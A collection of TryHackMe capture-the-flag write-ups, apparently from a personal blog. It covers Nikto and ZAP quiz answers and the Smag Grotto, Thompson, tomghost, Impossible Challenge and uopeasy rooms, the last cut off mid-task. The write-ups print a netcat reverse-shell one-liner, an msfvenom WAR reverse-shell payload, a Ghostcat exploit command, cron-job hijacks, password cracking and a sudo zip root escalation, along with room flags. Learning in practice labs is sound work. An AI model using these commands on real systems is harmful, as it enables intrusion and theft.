| 56 | ### #6 If instructed to, Nitko will attempt to guess and test both files within 57 | 58 | directories as well as usernames. Which switch and numerical value do we use to set Nikto to enumerate usernames in Apache? Keep in mind, this option is deprecated in favor of plugins, however, it's still a great 59 | option to be aware of for situational usage. 60 | 61 | ``` 62 | -mutate 3 63 | ``` 64 | 65 | ![](https://imgur.com/d3bHgpa.png) 66 | 67 | ### #7 Suppose we know the username and password for a web forum, how do we set Nikto to do a credentialed check? Suppose the username is admin and the password is PrettyAwesomePassword1234 68 | 69 | ``` 70 | -i admin:PrettyAwesomePassword1234 71 | ``` 72 | 73 | ![](https://imgur.com/nzo8Qsi.png) 74 | 75 | ### #8 Let's scan our target machine, what web server do we discover and what version is it? 
76 | 77 | ``` 78 | Apache/2.4.7 79 | ``` 80 | 81 | ![](https://imgur.com/T6kn7p7.png) 82 | 83 | ### #9 This box is vulnerable to very poor directory control due to its web server version, what directory is indexed that really shouldn't be? 84 | 85 | ``` 86 | config 87 | ``` 88 | 89 | ![](https://imgur.com/0ThZXh1.png) 90 | 91 | ### #10 Nikto scans can take a while to fully complete, which switch do we set in order to limit the scan to end at a certain time? 92 | 93 | ``` 94 | -until 95 | ``` 96 | 97 | ![](https://imgur.com/Jecp0D4.png) 98 | 99 | ### #11 But wait, there's more! How do we list all of the plugins that are available? 100 | 101 | ``` 102 | -list-plugins 103 | ``` 104 | 105 | ![](https://imgur.com/76zbgL7.png) 106 | 107 | ### #12 On the flip-side of the database, plugins represent another core component to Nikto. Which switch do we use to instruct Nikto to use plugin checks to find out of date software on the target host? Keep in mind that when testing this command we need to specify the host we intend to run this against. For submitting your answer, use only the base command with the out of date option. 108 | 109 | ``` 110 | -plugin outdated 111 | ``` 112 | 113 | ![](https://imgur.com/kWA0cZ6.png) 114 | 115 | ### #13 Finally, what if we'd like to use our plugins to run a series of standard tests against the target host? 116 | 117 | ``` 118 | -plugin tests 119 | ``` 120 | 121 | ![](https://imgur.com/b9bY8DX.png) 122 | 123 | --- 124 | 125 | A brief quiz and tutorial over using the OWASP Zap Scanner 126 | 127 | ### #1 Let's start simple and launch zap. This can be done in a number of ways (Commands: owasp-zap, zaproxy) or through launching it in the Kali GUI. 128 | 129 | ``` 130 | No answer needed 131 | ``` 132 | 133 | ### #2 Launch ZAP, what option do we set in order to specify what we are attacking? 134 | 135 | ``` 136 | Url to attack 137 | ``` 138 | 139 | ![](https://imgur.com/kNmCXtC.png) 140 | 141 | ### #3 Launch the attack against our target! 
Throughout the course of this attack you may notice this is very similar to Nikto. Similar to Nessus vs. 142 | 143 | OpenVAS, Nikto and ZAP both offer different perspectives on a host 144 | and, as such, it's useful to know how to leverage both scanning tools in order to maximize your own visibility in a situation wherein 'noise' 145 | doesn't particularly matter. 146 | 147 | ``` 148 | No answer needed 149 | ``` 150 | 151 | ### #4 ZAP will discover a file that typically contains pages which well-behaved web indexing engines will read in order to know which sections of a site to avoid. What is the name of this file? (Lucky for us, our scanner isn't what we would call 'well-behaved'!) 152 | 153 | ``` 154 | /robots.txt 155 | ``` 156 | 157 | ![](https://imgur.com/NubBOtV.png) 158 | 159 | ### #5 One entry is included in the disallow section of this file, what is it? 160 | 161 | ``` 162 | / 163 | ``` 164 | 165 | ![](https://imgur.com/KdHnPBX.png) 166 | 167 | ### #6 ZAP will find a directory that contains images for our application, what is the path for that directory? (This is what follows the name/ip of 168 | 169 | the website) 170 | 171 | ``` 172 | /dvwa/images 173 | ``` 174 | 175 | ![](https://imgur.com/To9An3c.png) 176 | 177 | ### #7 This website doesn't force a secure connection by default and ZAP isn't pleased with it. Which related cookie is ZAP upset about? 178 | 179 | ``` 180 | httpOnly 181 | ``` 182 | 183 | ![](https://imgur.com/A3rJmu1.png) 184 | 185 | ### #8 Featured in various rooms on TryHackMe, Cross-Site Scripting is a vicious attack that is becoming ever more common on the open web. What Alert does ZAP produce to let us know that this site is vulnerable to XSS? Note, there are often a couple warnings produced for this, look for one more so directly related to the web client. 186 | 187 | ``` 188 | Web Browser XSS Protection Not Enabled 189 | ``` 190 | 191 | ### #9 The ZAP proxy spider represents the component responsible for 'crawling' the site. 
What site is found to be out of scope? 192 | 193 | ![](https://imgur.com/tvDsmRF.png) 194 | 195 | ``` 196 | http://www.dvwa.co.uk/ 197 | ``` 198 | 199 | ### #10 ZAP will use primarily two methods in order to scan a website, which of these two HTTP methods requests content? 200 | 201 | ``` 202 | GET (logic) 203 | ``` 204 | 205 | ### #11 Which option attempts to submit content to the website? 206 | 207 | ``` 208 | POST 209 | ``` 210 | 211 | 212 | -------------------------------------------------------------------------------- /src/content/blog/smag-grotto.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: "Smag Grotto - TryHackMe" 3 | category: "THM" 4 | pubDate: 2020-07-30 5 | description: "Writeup for the Smag Grotto university of Portsmouth's beginner room" 6 | --- 7 | [TryHackMe | Smag Grotto](https://tryhackme.com/room/smaggrotto) 8 | 9 | Deploy the machine and get root privileges. 10 | 11 | --- 12 | 13 | ### Setup 14 | 15 | ``` 16 | [smaggrotto] nmap -A 10.10.192.6 2:01:00 17 | ``` 18 | 19 | ``` 20 | 22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0) 21 | | ssh-hostkey: 22 | | 2048 74:e0:e1:b4:05:85:6a:15:68:7e:16:da:f2:c7:6b:ee (RSA) 23 | | 256 bd:43:62:b9:a1:86:51:36:f8:c7:df:f9:0f:63:8f:a3 (ECDSA) 24 | |_ 256 f9:e7:da:07:8f:10:af:97:0b:32:87:c9:32:d7:1b:76 (ED25519) 25 | 26 | 80/tcp open http Apache httpd 2.4.18 ((Ubuntu)) 27 | | http-ls: Volume / 28 | | SIZE TIME FILENAME 29 | | 1.3K 2020-06-05 10:56 admin.php 30 | | 1.5K 2020-06-05 10:45 login.php 31 | | 139K 2020-06-05 10:19 materialize.min.css 32 | |_ 33 | |_http-server-header: Apache/2.4.18 (Ubuntu) 34 | |_http-title: Index of / 35 | Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel 36 | ``` 37 | 38 | ![](https://i.imgur.com/D9PypUN.png) 39 | 40 | Let's see if there is something on the website 41 | 42 | ![](https://i.imgur.com/aXIQi2Y.png) 43 | 44 | Well nothing of the website let's see of there is some hidden 
directory with gobuster/dirb 45 | 46 | ``` 47 | # Select your own wordlist 48 | [smaggrotto] gobuster -u 10.10.192.6 -w /opt/directory-list-2.3-medium.txt 49 | ``` 50 | 51 | ``` 52 | Gobuster v1.3 OJ Reeves (@TheColonial) 53 | ===================================================== 54 | [+] Mode : dir 55 | [+] Url/Domain : http://10.10.192.6/ 56 | [+] Threads : 10 57 | [+] Wordlist : /opt/directory-list-2.3-medium.txt 58 | [+] Status codes : 200,204,301,302,307 59 | ===================================================== 60 | /mail (Status: 301) 61 | ``` 62 | 63 | ![](https://i.imgur.com/V1XUxTY.png) 64 | 65 | ![](https://i.imgur.com/UZZG0pk.png) 66 | 67 | Nice, there is something interesting on this webpage: let's download the pcap (wireshark) file and extract the juicy data 👀 68 | 69 | ![](https://i.imgur.com/FZ4Kz25.png) 70 | 71 | The simple way to extract the data is to select the first packet, then go to the "Analyse" tab, then click on "Follow" and then "TCP Stream" 72 | 73 | ![](https://i.imgur.com/yKY9pMB.png) 74 | 75 | ![](https://i.imgur.com/RR1fGLX.png) 76 | 77 | Nice, the TCP stream shows the username and the password in clear text, but what are they for ? The SSH ? Or something else ? 🙄 78 | 79 | Before trying the SSH connection with those credentials, you can see in the TCP Stream that there is a Host : "development.smag.thm", let's take a look at this host. 80 | 81 | To add this host you need to edit your "/etc/hosts" file. 82 | 83 | ![](https://i.imgur.com/Q5KPLgs.png) 84 | 85 | ![](https://i.imgur.com/FLbTQw7.png) 86 | 87 | Well let's use the credentials that the TCP Stream gives us 88 | 89 | ``` 90 | h[nope 👁👄👁]k:cH[nope 👁👄👁]0w 91 | ``` 92 | 93 | ![](https://i.imgur.com/L0iBMqp.png) 94 | 95 | Nice, we can execute remote commands, let's try a reverse shell 🤩 96 | 97 | ![](https://i.imgur.com/UJiq34Y.png) 98 | 99 | (This is actually my own chrome extension to generate some reverse shell and more..) 
100 | 101 | [LasCC/Hack-Tools](https://github.com/LasCC/Hack-Tools) 102 | 103 | ``` 104 | rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.9.28.116 1337 >/tmp/f 105 | ``` 106 | 107 | ![](https://i.imgur.com/4pVmO2j.png) 108 | 109 | Nice we have a reverse shell, let's see if we can have the first flag 🏅 110 | 111 | ![](https://i.imgur.com/i1MkJLx.png) 112 | 113 | As you can see, we don't have permission to read the content of the file, so let's upload LinEnum to see if there are some potential attacks that we can perform. 114 | 115 | ![](https://i.imgur.com/G9PaoMF.png) 116 | 117 | Ah, I found something very interesting with the cronjob 118 | 119 | ![](https://i.imgur.com/MkUFU4L.png) 120 | 121 | As you can see, the cronjob takes jake's backup SSH public key and adds it to the authorised keys. If we create our own key and replace the content of the backup file with it, the cronjob will authorise our key and we can access the server ☺️ 122 | 123 | First let's generate our own SSH public key 👍 124 | 125 | ``` 126 | [smaggrotto] ssh-keygen -o 127 | ``` 128 | 129 | ![](https://i.imgur.com/kXjks3E.png) 130 | 131 | Nice we have our own SSH public key let's change the backup file on the server 👍 132 | 133 | ![](https://i.imgur.com/Q7IGUeR.png) 134 | 135 | Now let's wait one or two minutes and then we can log in to the server with the jake username 😀 136 | 137 | ``` 138 | [smaggrotto] ssh -i [Path to your ssh key] jake@10.10.192.6 139 | ``` 140 | 141 | ![](https://i.imgur.com/hEeAJH6.png) 142 | 143 | And voilà ! You have the access to the remote server ! 
🎉 144 | 145 | ### **#1 What is the user flag?** 146 | 147 | ``` 148 | iusGo[nope 👁👄👁]uqU3j 149 | ``` 150 | 151 | ![](https://i.imgur.com/5xn3kch.png) 152 | 153 | ### **#2 What is the root flag?** 154 | 155 | Now let's get a root access 😍 156 | 157 | ![](https://i.imgur.com/TcRPpC7.png) 158 | 159 | ![](https://i.imgur.com/9sh8unG.png) 160 | 161 | [apt get | GTFOBins](https://gtfobins.github.io/gtfobins/apt-get/#sudo) 162 | 163 | ![](https://i.imgur.com/iDrkgGN.png) 164 | 165 | ``` 166 | uJr6zRgetan[nope 👁👄👁]bBKz2T 167 | ``` 168 | 169 | 170 | -------------------------------------------------------------------------------- /src/content/blog/the-impossible-challenge.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: "The Impossible Challenge - TryHackMe" 3 | category: "THM" 4 | pubDate: 2020-07-19 5 | description: "Writeup for the The Impossible Challenge room" 6 | --- 7 | [TryHackMe | The Impossible Challenge](https://tryhackme.com/room/theimpossiblechallenge) 8 | 9 | Download the file, and find the Flag! 10 | 11 | ``` 12 | qo qt q`r6 ro su pn s_ rn r6 p6 s_ q2 ps qq rs rp ps rt r4 pu pt qn r4 rq pt q` so pu ps r4 sq pu ps q2 su rn on oq o\_ pu ps ou r5 pu pt r4 sr rp qt pu rs q2 qt r4 r4 ro su pq o5 13 | ``` 14 | 15 | Let's download the file to see if there is some kind of help ? 16 | 17 | ![](https://i.imgur.com/yjvNp4i.png) 18 | 19 | Err, we need a password let's see if we can decode the hidden message that the creator of the room tell us. 20 | 21 | ![](https://i.imgur.com/ap2H90U.png) 22 | 23 | ``` 24 | ROT13 > ROT47 > HEX > Base64 25 | -- 26 | It's inside the text, in front of your eyes! 27 | ``` 28 | 29 | Hmm well, there is something hidden in front of my eyes 👀 Let's find it ! 30 | 31 | ![](https://i.imgur.com/GjqBC5j.png) 32 | 33 | When you hover the description message on the room you can see there is something odd, let's see if we can decode it ! 
34 | 35 | This is unicode steganography with Zero-With Characters 36 | 37 | [Unicode Steganography with Zero-Width Characters](https://330k.github.io/misc_tools/unicode_steganography.html) 38 | 39 | ![](https://i.imgur.com/aXK0yTK.png) 40 | 41 | ``` 42 | Password to decode the archive : hahaezpz 43 | ``` 44 | 45 | ![](https://i.imgur.com/8PEL4sW.png) 46 | 47 | ``` 48 | THM{Zero_Width_Characters_EZPZ} 49 | ``` 50 | 51 | 52 | -------------------------------------------------------------------------------- /src/content/blog/thompson.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: "Thompson - TryHackMe" 3 | category: "THM" 4 | pubDate: 2020-06-07 5 | description: "Writeup for the Thompson room on TryHackMe" 6 | --- 7 | [TryHackMe | Thompson](https://tryhackme.com/room/bsidesgtthompson) 8 | Read user.txt and root.txt 9 | 10 | --- 11 | 12 | ### Setup 13 | 14 | ``` 15 | ➜ TryHackMe nmap -A -vv 10.10.221.95 16 | ``` 17 | 18 | ``` 19 | 22/tcp open ssh syn-ack OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0) 20 | | ssh-hostkey: 21 | | 2048 fc:05:24:81:98:7e:b8:db:05:92:a6:e7:8e:b0:21:11 (RSA) 22 | | ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDL+0hfJnh2z0jia21xVo/zOSRmzqE/qWyQv1G+8EJNXze3WPjXsC54jYeO0lp2SGq+sauzNvmWrHcrLKHtugMUQmkS9gD/p4zx4LjuG0WKYYeyLybs4WrTTmCU8PYGgmud9SwrDlEjX9AOEZgP/gj1FY+x+TfOtIT2OEE0Exvb86LhPj/AqdahABfCfxzHQ9ZyS6v4SMt/AvpJs6Dgady20CLxhYGY9yR+V4JnNl4jxwg2j64EGLx4vtCWNjwP+7ROkTmP6dzR7DxsH1h8Ko5C45HbTIjFzUmrJ1HMPZMo9ss0MsmeXPnZTmp5TxsxbLNJGSbDv7BS9gdCyTf0+Qq1 23 | | 256 60:c8:40:ab:b0:09:84:3d:46:64:61:13:fa:bc:1f:be (ECDSA) 24 | | ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBG6CiO2B7Uei2whKgUHjLmGY7dq1uZFhZ3wY5EWj5L7ylSj+bx5pwaiEgU/Velkp4ZWXM//thL6K1lAAPGLxHMM= 25 | | 256 b5:52:7e:9c:01:9b:98:0c:73:59:20:35:ee:23:f1:a5 (ED25519) 26 | |_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIIwYtK4oCnQLSoBYAztlgcEsq8FLNL48LyxC2RfxC+33 27 | 28 | 8009/tcp open ajp13 syn-ack Apache Jserv 
(Protocol v1.3) 29 | |_ajp-methods: Failed to get a valid response for the OPTION request 30 | 31 | 8080/tcp open http syn-ack Apache Tomcat 8.5.5 32 | |_http-favicon: Apache Tomcat 33 | | http-methods: 34 | |_ Supported Methods: GET HEAD POST 35 | |_http-title: Apache Tomcat/8.5.5 36 | Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel 37 | ``` 38 | 39 | ![](https://imgur.com/gQ8AzdM.png) 40 | 41 | Let's try the "manager app" button 42 | 43 | ![](https://imgur.com/Ty59zwz.png) 44 | 45 | Well, I tried the cancel button because I don't have any credentials 46 | 47 | ![](https://imgur.com/0wnAZv3.png) 48 | 49 | For some obscure reason (maybe a bad configuration) there is a username and a password, let's try them ! 🤨 50 | 51 | ![](https://imgur.com/x0PrhCR.png) 52 | 53 | ![](https://imgur.com/7CTEfM6.png) 54 | 55 | Well that worked, let's see if there is a way to upload some reverse shell 🤑 56 | 57 | ![](https://imgur.com/n7GjOi7.png) 58 | 59 | I noticed a WAR file uploader, let's search for something on github/google 60 | 61 | [Multiple Ways to Exploit Tomcat Manager](https://www.hackingarticles.in/multiple-ways-to-exploit-tomcat-manager/) 62 | 63 | ``` 64 | ➜ TryHackMe msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.9.2.228 LPORT=1234 -f war > shell.war 65 | ``` 66 | 67 | ![](https://imgur.com/FwO3JC4.png) 68 | 69 | ### #1 user.txt 70 | 71 | ``` 72 | 39400c90bc683a41a8935e4719f181bf 73 | ``` 74 | 75 | ### #2 root.txt 76 | 77 | ``` 78 | $ id 79 | uid=1001(tomcat) gid=1001(tomcat) groups=1001(tomcat) 80 | 81 | $ bash id.sh 82 | id.sh: line 2: test.txt: Permission denied 83 | 84 | $ cat id.sh 85 | #!/bin/bash 86 | id > test.txt 87 | 88 | $ cat test.txt 89 | uid=0(root) gid=0(root) groups=0(root) 90 | ``` 91 | 92 | The content of test.txt shows that id.sh is being run as root, so if we replace the content of `id.sh` with a command that copies the root key, it should be executed with root privileges. Let's try that ! 
:D 93 | 94 | ``` 95 | echo "cp /root/root.txt /home/jack/root.txt" > id.sh 96 | ``` 97 | 98 | ``` 99 | # Its a cron job its gonna take some time.. 100 | $ cat id.sh 101 | cp /root/root.txt /home/jack/root.txt 102 | 103 | $ ls 104 | id.sh root.txt test.txt user.txt 105 | 106 | $ cat root.txt 107 | d89d5391984c0450a95497153ae7ca3a 108 | ``` 109 | 110 | 111 | -------------------------------------------------------------------------------- /src/content/blog/tomghost.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: "tomghost - TryHackMe" 3 | category: "THM" 4 | pubDate: 2020-05-12 5 | description: "Writeup for the tomghost challenge" 6 | --- 7 | [TryHackMe | tomghost](https://tryhackme.com/room/tomghost) 8 | 9 | ![](https://i.imgur.com/fR0jVuM.png) 10 | 11 | **Are you able to complete the challenge?** 12 | 13 | The machine may a take up to 5 minutes to boot and configure. 14 | 15 | ### Setup 16 | 17 | ``` 18 | nmap -sV -sC -vv 10.10.68.237 19 | ``` 20 | 21 | ``` 22 | Discovered open port 53/tcp on 10.10.68.237 23 | Discovered open port 22/tcp on 10.10.68.237 24 | Discovered open port 8080/tcp on 10.10.68.237 25 | Discovered open port 8009/tcp on 10.10.68.237 26 | ``` 27 | 28 | ``` 29 | 22/tcp open ssh syn-ack OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0) 30 | | ssh-hostkey: 31 | | 2048 f3:c8:9f:0b:6a:c5:fe:95:54:0b:e9:e3:ba:93:db:7c (RSA) 32 | | ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDQvC8xe2qKLoPG3vaJagEW2eW4juBu9nJvn53nRjyw7y/0GEWIxE1KqcPXZiL+RKfkKA7RJNTXN2W9kCG8i6JdVWs2x9wD28UtwYxcyo6M9dQ7i2mXlJpTHtSncOoufSA45eqWT4GY+iEaBekWhnxWM+TrFOMNS5bpmUXrjuBR2JtN9a9cqHQ2zGdSlN+jLYi2Z5C7IVqxYb9yw5RBV5+bX7J4dvHNIs3otGDeGJ8oXVhd+aELUN8/C2p5bVqpGk04KI2gGEyU611v3eOzoP6obem9vsk7Kkgsw7eRNt1+CBrwWldPr8hy6nhA6Oi5qmJgK1x+fCmsfLSH3sz1z4Ln 33 | | 256 dd:1a:09:f5:99:63:a3:43:0d:2d:90:d8:e3:e1:1f:b9 (ECDSA) 34 | | ecdsa-sha2-nistp256 
AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBOscw5angd6i9vsr7MfCAugRPvtx/aLjNzjAvoFEkwKeO53N01Dn17eJxrbIWEj33sp8nzx1Lillg/XM+Lk69CQ= 35 | | 256 48:d1:30:1b:38:6c:c6:53:ea:30:81:80:5d:0c:f1:05 (ED25519) 36 | |_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIGqgzoXzgz5QIhEWm3+Mysrwk89YW2cd2Nmad+PrE4jw 37 | 38 | 53/tcp open tcpwrapped syn-ack 39 | 40 | 8009/tcp open ajp13 syn-ack Apache Jserv (Protocol v1.3) 41 | | ajp-methods: 42 | |_ Supported methods: GET HEAD POST OPTIONS 43 | 44 | 8080/tcp open http syn-ack Apache Tomcat 9.0.30 45 | |_http-favicon: Apache Tomcat 46 | | http-methods: 47 | |_ Supported Methods: GET HEAD POST OPTIONS 48 | |_http-open-proxy: Proxy might be redirecting requests 49 | |_http-title: Apache Tomcat/9.0.30 50 | Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel 51 | ``` 52 | 53 | After trying to exploit Apache Tomcat on port 8080, I realized that I was wrong about that, so I turned to the other service, Apache Jserv (AJP) on port 8009. I searched on github for an exploit and I found this. 54 | 55 | [00theway/Ghostcat-CNVD-2020-10487](https://github.com/00theway/Ghostcat-CNVD-2020-10487) 56 | 57 | ``` 58 | python3 ajpShooter.py http://10.10.68.237:8080 8009 /WEB-INF/web.xml read 59 | # URL:PORT + Jserv PORT + /WEB-INF/web.xml read 60 | ``` 61 | 62 | ![](https://imgur.com/FtZHUNJ.png) 63 | 64 | ``` 65 | skyfuck:8730281lkjlkjdqlksalks 66 | # Let's try to ssh this 67 | ``` 68 | 69 | ![](https://imgur.com/fsV6mGi.png) 70 | 71 | ### #1 Compromise this machine and obtain user.txt 72 | 73 | ![](https://imgur.com/XCy6lRK.png) 74 | 75 | ``` 76 | skyfuck@ubuntu:~$ cd /home 77 | skyfuck@ubuntu:/home$ ls 78 | merlin skyfuck 79 | skyfuck@ubuntu:/home$ cd merlin/ 80 | skyfuck@ubuntu:/home/merlin$ ls 81 | user.txt 82 | skyfuck@ubuntu:/home/merlin$ cat user.txt 83 | THM{GhostCat_1s_so_cr4sy} 84 | ``` 85 | 86 | ### #2 Escalate privileges and obtain root.txt 87 | 88 | If you go back to skyfuck's home directory you will see the files "credential.pgp" and "tryhackme.asc", 89 | 90 | let's scp 
them to our machine to crack them. 91 | 92 | ``` 93 | ➜ TryHackMe scp skyfuck@10.10.68.237:/home/skyfuck/credential.pgp . 94 | skyfuck@10.10.68.237 password: 95 | credential.pgp 96 | 97 | ➜ TryHackMe scp skyfuck@10.10.68.237:/home/skyfuck/tryhackme.asc . 98 | skyfuck@10.10.68.237 password: 99 | tryhackme.asc 100 | ``` 101 | 102 | For this i'll use gpg2john 103 | 104 | ``` 105 | ➜ TryHackMe sudo gpg2john tryhackme.asc > bopme 106 | 107 | File tryhackme.asc 108 | ➜ TryHackMe cat bopme 109 | tryhackme:$gpg$*17*54*3072*713ee3f57cc950f8f89155679abe2476c62bbd286ded0e049f886d32d2b9eb06f482e9770c710abc2903f1ed70af6fcc22f5608760be*3*254*2*9*16*0c99d5dae8216f2155ba2abfcc71f818*65536*c8f277d2faf97480:::tryhackme ::tryhackme.asc 110 | ``` 111 | 112 | Now the fun part crack the gpg ! 113 | 114 | ``` 115 | ➜ TryHackMe sudo john bopme --wordlist=/usr/share/wordlists/rockyou.txt 116 | Using default input encoding: UTF-8 117 | Loaded 1 password hash (gpg, OpenPGP / GnuPG Secret Key [32/64]) 118 | Cost 1 (s2k-count) is 65536 for all loaded hashes 119 | Cost 2 (hash algorithm [1:MD5 2:SHA1 3:RIPEMD160 8:SHA256 9:SHA384 10:SHA512 11:SHA224]) is 2 for all loaded hashes 120 | Cost 3 (cipher algorithm [1:IDEA 2:3DES 3:CAST5 4:Blowfish 7:AES128 8:AES192 9:AES256 10:Twofish 11:Camellia128 12:Camellia192 13:Camellia256]) is 9 for all loaded hashes 121 | Will run 2 OpenMP threads 122 | Press 'q' or Ctrl-C to abort, almost any other key for status 123 | 124 | "alexandru" (tryhackme) 125 | 126 | 1g 0:00:00:00 DONE (2020-05-12 14:27) 10.00g/s 10720p/s 10720c/s 10720C/s chinita..alexandru 127 | Use the "--show" option to display all of the cracked passwords reliably 128 | Session completed 129 | ``` 130 | 131 | Nice we have the password 132 | 133 | ``` 134 | alexandru 135 | ``` 136 | 137 | Now let's decrypt the pgp file, but first let's import the tryhackme.asc 138 | 139 | ``` 140 | ➜ TryHackMe gpg --import tryhackme.asc 141 | gpg: key 8F3DA3DEC6707170: "tryhackme " not changed 142 | gpg: key 
8F3DA3DEC6707170: secret key imported 143 | gpg: key 8F3DA3DEC6707170: "tryhackme " not changed 144 | gpg: Total number processed: 2 145 | gpg: unchanged: 2 146 | gpg: secret keys read: 1 147 | gpg: secret keys imported: 1 148 | 149 | # password => alexandru 150 | ``` 151 | 152 | ``` 153 | ➜ TryHackMe gpg --decrypt credential.pgp 154 | gpg: WARNING: cipher algorithm CAST5 not found in recipient preferences 155 | gpg: encrypted with 1024-bit ELG key, ID 61E104A66184FBCC, created 2020-03-11 156 | "tryhackme " 157 | merlin:asuyusdoiuqoilkda312j31k2j123j1g23g12k3g12kj3gk12jg3k12j3kj123j 158 | ``` 159 | 160 | Nice, we have merlin's ssh password. It fell out this easily because the private key sat next to the encrypted file and its passphrase is a wordlist entry. 161 | 162 | ![](https://imgur.com/zrEzvSs.png) 163 | 164 | Let's root the machine ! This works because merlin can run `zip` through sudo and zip's `-TT` option runs a command of the caller's choosing, so a sudo rule for a tool that can spawn commands is equivalent to granting a root shell. 165 | 166 | [zip | GTFOBins](https://gtfobins.github.io/gtfobins/zip/) 167 | 168 | ``` 169 | merlin@ubuntu:~$ TF=$(mktemp -u) 170 | merlin@ubuntu:~$ sudo zip $TF /etc/hosts -T -TT 'sh #' 171 | adding: etc/hosts (deflated 31%) 172 | $ id 173 | uid=0(root) gid=0(root) groups=0(root) 174 | $ cd /root/ 175 | $ ls 176 | root.txt ufw 177 | $ cat root.txt 178 | THM{Z1P_1S_FAKE} 179 | 180 | ``` 181 | 182 | 183 | -------------------------------------------------------------------------------- /src/content/blog/uopeasy.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: "uopeasy - TryHackMe" 3 | category: "THM" 4 | pubDate: 2020-07-18 5 | description: "Writeup for the uopeasy university of Portsmouth's beginner room" 6 | --- 7 | [TryHackMe | uopeasy](https://tryhackme.com/room/uopeasy) 8 | 9 | University of Portsmouth's beginner room. 10 | 11 | In this set of tasks you will learn the following: 12 | 13 | - Basic SQL injection 14 | - Use of reconnaissance tool 15 | - nmap 16 | - WordPress RCE and reverse shells 17 | - Cracking the hash (John the ripper / hashcat) 18 | - Possibly Nikto 19 | - Burp Suite or dirbuster 20 | 21 | The main goal here is to learn as much as possible. 
Make sure you are connected to our network using your [OpenVPN configuration file](https://tryhackme.com/access). 22 | 23 | --- 24 | 25 | ### Setup 26 | 27 | ``` 28 | ➜ TryHackMe nmap -A -vv 10.10.180.236 29 | ``` 30 | 31 | ``` 32 | 80/tcp open http syn-ack Apache httpd 2.4.7 ((Ubuntu)) 33 | | http-methods: 34 | |_ Supported Methods: OPTIONS GET HEAD POST 35 | |_http-server-header: Apache/2.4.7 (Ubuntu) 36 | |_http-title: Site doesnt have a title (text/html). 37 | 38 | 443/tcp open ssl/http syn-ack Apache httpd 39 | |_http-favicon: Unknown favicon MD5: A8B5AD142FFA4621B3DBF67BDECA483A 40 | | http-methods: 41 | |_ Supported Methods: GET HEAD POST OPTIONS 42 | |_http-server-header: Apache 43 | |_http-title: 400 Bad Request 44 | | ssl-cert: Subject: commonName=www.example.com 45 | | Issuer: commonName=www.example.com 46 | | Public Key type: rsa 47 | | Public Key bits: 1024 48 | | Signature Algorithm: sha1WithRSAEncryption 49 | | Not valid before: 2015-02-17T03:30:05 50 | | Not valid after: 2025-02-14T03:30:05 51 | | MD5: ebd4 a980 6e51 1b13 769e d4b1 28f9 71dd 52 | | SHA-1: 6297 03e9 f83b 06e7 d50d 3f4b 5bae 38c9 7665 cc64 53 | | -----BEGIN CERTIFICATE----- 54 | | MIIBqzCCARQCCQDg5heFLm8t8jANBgkqhkiG9w0BAQUFADAaMRgwFgYDVQQDDA93 55 | | d3cuZXhhbXBsZS5jb20wHhcNMTUwMjE3MDMzMDA1WhcNMjUwMjE0MDMzMDA1WjAa 56 | | MRgwFgYDVQQDDA93d3cuZXhhbXBsZS5jb20wgZ8wDQYJKoZIhvcNAQEBBQADgY0A 57 | | MIGJAoGBANFjfgmsBCGKWfdqCYZnY2mKvtUnYFtenVjtqdReduE12yavSQZuWAi2 58 | | jIpCUMwG7RG3QAwyzCoMWAzF/tZimI8uNL8G9m84l/wQAbTPMPJTgJXpwY0/9IRc 59 | | hdqtpFoVS251qA9AvPeqMv/hV+rKVAkYcONB6Q8Or8S6ifkEBAZbAgMBAAEwDQYJ 60 | | KoZIhvcNAQEFBQADgYEAQ3Kt0nVDLMkAv9/k1bt6KaM06cvTtiekgu0ugxA0TNXC 61 | | FNIBqu/Fasog43FRLuUtAtNCNMqI5QAAVPatQPk1QmVoE+IxbvxldrKykZk9oXkj 62 | | 5rbE43BAkxyiMvuNsZh7W2Lzx14tlA84c8B4Y1S0CqoVLpaJaCQ5MtVMSya3wAM= 63 | |_-----END CERTIFICATE----- 64 | 65 | 8080/tcp open http syn-ack Apache httpd 66 | |_http-favicon: Unknown favicon MD5: A8B5AD142FFA4621B3DBF67BDECA483A 67 | | http-methods: 
68 | |_ Supported Methods: GET HEAD POST OPTIONS 69 | |_http-open-proxy: Proxy might be redirecting requests 70 | |_http-server-header: Apache 71 | |_http-title: Site doesn't have a title (text/html). 72 | ``` 73 | 74 | ![https://imgur.com/9SK08g2.png](https://imgur.com/9SK08g2.png) 75 | 76 | ![https://imgur.com/G7Wb80W.png](https://imgur.com/G7Wb80W.png) 77 | 78 | ### #1 Deploy the machine and connect to **our network.** 79 | 80 | ``` 81 | No awnser needed 82 | ``` 83 | 84 | ### #2 Do some basic reconnaissance on the website. What pages can you view? What ports are open? What can you access? 85 | 86 | ``` 87 | No awnser needed 88 | ``` 89 | 90 | ### #3 You should have found some additional pages on different ports. What service does the site most likely use for this page? 91 | 92 | ``` 93 | mysql 94 | ``` 95 | 96 | ### #4 Using the fact that this site has this service running, how can you exploit it? Do not use SQLMap yet.. 97 | 98 | ``` 99 | Since this is some php room let's say that is SQLi (SQL Injection) 100 | ``` 101 | 102 | ``` 103 | SQLi 104 | ``` 105 | 106 | ### #5 Try and return 1 on the page by entering certain characters into the form. 107 | 108 | ``` 109 | No awnser needed 110 | ``` 111 | 112 | ### #6 Using SQL injection, can you extract the username and password for this form? You may need the help of Burp's intruder function OR SQLMap. 